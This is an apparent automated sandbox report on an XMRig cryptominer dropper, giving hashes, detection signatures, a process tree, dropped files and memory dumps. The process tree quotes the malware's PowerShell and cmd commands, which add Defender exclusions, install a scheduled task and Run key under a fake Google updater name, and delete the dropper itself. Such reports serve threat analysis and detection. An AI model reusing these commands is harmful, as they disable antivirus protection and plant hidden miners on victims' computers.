Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1799s
  • max time network
    1789s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 31 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3336
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:4964
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1624
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:732
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4832
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1904
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:3952
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:3788
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:3536
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe qtdiqnkejoz
          2⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious behavior: EnumeratesProcesses
          PID:4316
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          2⤵
          • Drops file in Program Files directory
          • Suspicious use of WriteProcessMemory
          PID:4716
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PATH Win32_VideoController GET Name, VideoProcessor
            3⤵
            • Detects videocard installed
            PID:3564
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
          2⤵
            PID:3504
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          1⤵
            PID:2940
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1124
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
              2⤵
              • Drops file in Program Files directory
              PID:1780

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Discovery

          System Information Discovery

          1
          T1082

          Query Registry

          1
          T1012

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            753KB

            MD5

            425de7f486958625f94ca6c2bea3f12f

            SHA1

            b92cdca388f7f85c93cb33819a707de08d940c81

            SHA256

            22ec757cb92a96c0c1f09dad3bf8623a29dfc71b644d4fc8921b5e0de35c2dd5

            SHA512

            f84765de56de8c990801dc71010c2dc17edd1b7a826e29bc1e7da8478ffc7eec5f53f27691757b7f420b7be1d3b262d7aacb21fd8fe83888d020ea0b5b716cb3

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            2.0MB

            MD5

            3eee529a92cffc1a1a1bfa179452aaf8

            SHA1

            06dc67292f5eab724ff8f6639d8b3cc4fa856e9e

            SHA256

            7fd74579883f6ba2c8914703c49be6633649dced9c3e7d2b0e975076725c06bf

            SHA512

            b9ae92596a457a4e967a055a9532c30abc14b5fd5b04341a6c8958a95faf46aca633e4478f98c106a6af133ea43b8f4741690d5734cc51fefb93fc74217744fd

          • C:\Program Files\Google\Libs\g.log
            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            6d42b6da621e8df5674e26b799c8e2aa

            SHA1

            ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

            SHA256

            5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

            SHA512

            53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            7140ccf74fcbd9163b3c532a69f5ff6e

            SHA1

            57bc8d30e61acbda9dcde9d9434f559c9d38aac3

            SHA256

            c32be57fa8e9807007fa8bf35a630b893a4699e5251dbc179310b5a5640085b6

            SHA512

            292be07038e4f6c0151b6d2bdb6471abb96098dbd8eb97fff59608cb1b0a06c952727847227b0248113f7f93ed6aaca59f6727e222269ec20b6933eeaa7281df

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5mwjakfx.eqp.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

          • memory/732-31-0x000001AC45FA0000-0x000001AC45FB0000-memory.dmp
            Filesize

            64KB

          • memory/732-22-0x00007FFF10A90000-0x00007FFF11551000-memory.dmp
            Filesize

            10.8MB

          • memory/732-30-0x000001AC45FA0000-0x000001AC45FB0000-memory.dmp
            Filesize

            64KB

          • memory/732-29-0x000001AC45FA0000-0x000001AC45FB0000-memory.dmp
            Filesize

            64KB

          • memory/732-28-0x000001AC45FA0000-0x000001AC45FB0000-memory.dmp
            Filesize

            64KB

          • memory/732-33-0x00007FFF10A90000-0x00007FFF11551000-memory.dmp
            Filesize

            10.8MB

          • memory/1124-119-0x00007FF77E3B0000-0x00007FF77E5C1000-memory.dmp
            Filesize

            2.1MB

          • memory/1124-52-0x00007FF77E3B0000-0x00007FF77E5C1000-memory.dmp
            Filesize

            2.1MB

          • memory/1624-12-0x00000151F08B0000-0x00000151F08C0000-memory.dmp
            Filesize

            64KB

          • memory/1624-15-0x00007FFF10A90000-0x00007FFF11551000-memory.dmp
            Filesize

            10.8MB

          • memory/1624-11-0x00007FFF10A90000-0x00007FFF11551000-memory.dmp
            Filesize

            10.8MB

          • memory/1624-1-0x00000151F0880000-0x00000151F08A2000-memory.dmp
            Filesize

            136KB

          • memory/1904-37-0x0000019AE05A0000-0x0000019AE05B0000-memory.dmp
            Filesize

            64KB

          • memory/1904-51-0x00007FFF10A90000-0x00007FFF11551000-memory.dmp
            Filesize

            10.8MB

          • memory/1904-38-0x0000019AE05A0000-0x0000019AE05B0000-memory.dmp
            Filesize

            64KB

          • memory/1904-36-0x00007FFF10A90000-0x00007FFF11551000-memory.dmp
            Filesize

            10.8MB

          • memory/3504-142-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-162-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-190-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-188-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-186-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-184-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-182-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-180-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-178-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-176-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-174-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-172-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-170-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-168-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-166-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-164-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-156-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-154-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-152-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-118-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-117-0x0000029573DF0000-0x0000029573E10000-memory.dmp
            Filesize

            128KB

          • memory/3504-150-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-148-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-146-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-123-0x0000029574030000-0x0000029574050000-memory.dmp
            Filesize

            128KB

          • memory/3504-144-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-125-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-127-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-128-0x0000029574050000-0x0000029574070000-memory.dmp
            Filesize

            128KB

          • memory/3504-129-0x0000029574070000-0x0000029574090000-memory.dmp
            Filesize

            128KB

          • memory/3504-131-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-132-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-140-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-134-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3504-135-0x0000029574050000-0x0000029574070000-memory.dmp
            Filesize

            128KB

          • memory/3504-136-0x0000029574070000-0x0000029574090000-memory.dmp
            Filesize

            128KB

          • memory/3504-138-0x00007FF6C9A50000-0x00007FF6CA244000-memory.dmp
            Filesize

            8.0MB

          • memory/3536-99-0x0000021963880000-0x0000021963890000-memory.dmp
            Filesize

            64KB

          • memory/3536-113-0x00007FFF10A90000-0x00007FFF11551000-memory.dmp
            Filesize

            10.8MB

          • memory/3536-94-0x0000021963880000-0x0000021963890000-memory.dmp
            Filesize

            64KB

          • memory/3536-88-0x00007FFF10A90000-0x00007FFF11551000-memory.dmp
            Filesize

            10.8MB

          • memory/3536-110-0x0000021963880000-0x0000021963890000-memory.dmp
            Filesize

            64KB

          • memory/3536-111-0x0000021963880000-0x0000021963890000-memory.dmp
            Filesize

            64KB

          • memory/3788-78-0x000002161F830000-0x000002161F83A000-memory.dmp
            Filesize

            40KB

          • memory/3788-81-0x000002161F870000-0x000002161F876000-memory.dmp
            Filesize

            24KB

          • memory/3788-53-0x00007FFF10A90000-0x00007FFF11551000-memory.dmp
            Filesize

            10.8MB

          • memory/3788-75-0x000002161F620000-0x000002161F6D5000-memory.dmp
            Filesize

            724KB

          • memory/3788-76-0x000002161F6E0000-0x000002161F6EA000-memory.dmp
            Filesize

            40KB

          • memory/3788-73-0x000002161F600000-0x000002161F61C000-memory.dmp
            Filesize

            112KB

          • memory/3788-74-0x000002161D260000-0x000002161D270000-memory.dmp
            Filesize

            64KB

          • memory/3788-77-0x000002161F850000-0x000002161F86C000-memory.dmp
            Filesize

            112KB

          • memory/3788-79-0x000002161F890000-0x000002161F8AA000-memory.dmp
            Filesize

            104KB

          • memory/3788-86-0x00007FFF10A90000-0x00007FFF11551000-memory.dmp
            Filesize

            10.8MB

          • memory/3788-83-0x000002161D260000-0x000002161D270000-memory.dmp
            Filesize

            64KB

          • memory/3788-82-0x000002161F880000-0x000002161F88A000-memory.dmp
            Filesize

            40KB

          • memory/3788-80-0x000002161F840000-0x000002161F848000-memory.dmp
            Filesize

            32KB

          • memory/3788-59-0x000002161D260000-0x000002161D270000-memory.dmp
            Filesize

            64KB

          • memory/4316-133-0x00007FF62A0B0000-0x00007FF62A0C6000-memory.dmp
            Filesize

            88KB

          • memory/4316-124-0x00007FF62A0B0000-0x00007FF62A0C6000-memory.dmp
            Filesize

            88KB

          • memory/4964-35-0x00007FF621150000-0x00007FF621361000-memory.dmp
            Filesize

            2.1MB

          • memory/4964-0-0x00007FF621150000-0x00007FF621361000-memory.dmp
            Filesize

            2.1MB